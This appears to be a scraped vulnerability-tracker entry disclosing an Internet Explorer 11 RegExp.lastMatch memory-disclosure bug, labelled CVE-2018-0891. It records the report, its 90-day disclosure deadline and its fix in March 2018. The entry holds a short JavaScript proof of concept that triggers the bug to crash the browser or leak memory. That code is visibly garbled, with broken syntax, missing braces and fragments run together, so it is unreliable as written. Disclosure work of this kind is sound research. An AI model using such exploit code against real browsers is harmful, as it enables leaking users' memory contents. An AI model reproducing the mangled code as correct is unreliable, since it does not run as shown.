
Issue 1461


Issue metadata

Status: Fixed
Closed: Mar 2018


IE11: RegExp.lastMatch memory disclosure

Project Member Reported by, Dec 6 2017

Issue description

There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Windows 7 64-bit with the latest patches applied.



<!-- saved from url=(0014)about:internet -->

function main() {
  RegExp.input = {toString: f};

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {, "bbbbbbbbbb");




Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed (see the attached screenshot).

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Project Member

Comment 1 by, Dec 6 2017

Attachment (31.3 KB)
Project Member

Comment 2 by, Feb 20 2018

Labels: CVE-2018-0891
Project Member

Comment 3 by, Mar 1 2018

Labels: Deadline-Grace
Project Member

Comment 4 by, Mar 20 2018

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
Fixed in
